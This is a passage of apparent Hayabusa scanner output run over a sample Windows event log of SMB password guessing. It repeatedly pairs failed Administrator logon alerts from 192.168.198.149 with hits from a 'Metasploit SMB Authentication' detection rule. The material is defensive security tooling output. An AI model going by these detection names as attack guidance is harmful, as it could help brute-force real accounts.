Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSQxMrGlDiAOo6ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gL0rz3p1yG6RhfAT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyChoTSKgJeK6yqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG4I11dwpBM9SM3l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7foAZ5Y1igCbHap : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ATDXUljQwg8WvUVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdmXaJqQMAG2g6Ao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bjame5puT5CDeoIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0FGGVVkckmdURVh6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j0Smqw4cA4wG2Q6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLWloOhUYEQlj6y6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Tuxuykh0j5afeTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeXS6QwYhqJAOeuz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AqFSJCq5bmBW6dj1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DH1zyt1hxTgzajhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rrZxcWjUX4OgYYIb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ExtkYXSJI8F41uvw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sLh1Q3RieOoukiCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kNb2hZDxi4QrbQpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCb1TMlFj2PjH2sA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rgF42C57Nx6F3HU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KZfFH9geIrxVYowJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWz1XeyxywR0o5gS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: og1kItEC6WhqXF37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0KhaJlD6tWwF2ky : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUy0EKmjyD6ZYENA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h3MdGstPPFJDGzwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTs0ZQa6LGrKZKsY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FefzWjMXSvMdvqcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnUt9tPRSXR5mWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dehb4M6pcxi56Bkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tLXHvGiUqZyxax4W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP1gKcf1eeKm0RB1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldbN1odP77n0BOzO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: drRC8qCbPe5e4mdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lBg39AUtzZi6Q4iz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huv5YEPo1n7UiFkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9CLLwao1NDtBulxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SB88EHHhDWhvJI87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBvklueV4MZo3pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: noha7Vw85VfURHik : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wl5eIYvoKpJGUcSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsS3JTLUWcFYvxAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM6hj2bGxC124oZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3IQkVcY5iMTxCRN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v44Kp3lpGKb6Xd4j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1skdEmGlXbzUWk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 